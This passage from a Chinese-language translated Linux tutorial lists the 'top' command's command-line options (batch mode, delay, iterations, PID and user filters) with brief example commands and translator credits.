### 3. 命令行选项: ###
#### 3.1 -b: 批处理模式 ####
#### 3.2 -c: 命令/程序名 触发: ####
#### 3.3 -d: 设置延迟间隔 ####
$ top -d 1
#### 3.4 -i: 空闲进程触发 ####
#### 3.5 -n: 设置迭代数量 ####
$ top -n 3
#### 3.6 -p: 监控特定的PID ####
#### 3.7 -u or -U: 用户名 或者 UID ####
$ top -p 28453 -u raghu
top: conflicting process selections (U/p/u)
译者:[geekpi]( 校对:[校对者ID](校对者ID)
本文由 [LCTT]( 原创翻译,[Linux中国]( 荣誉推出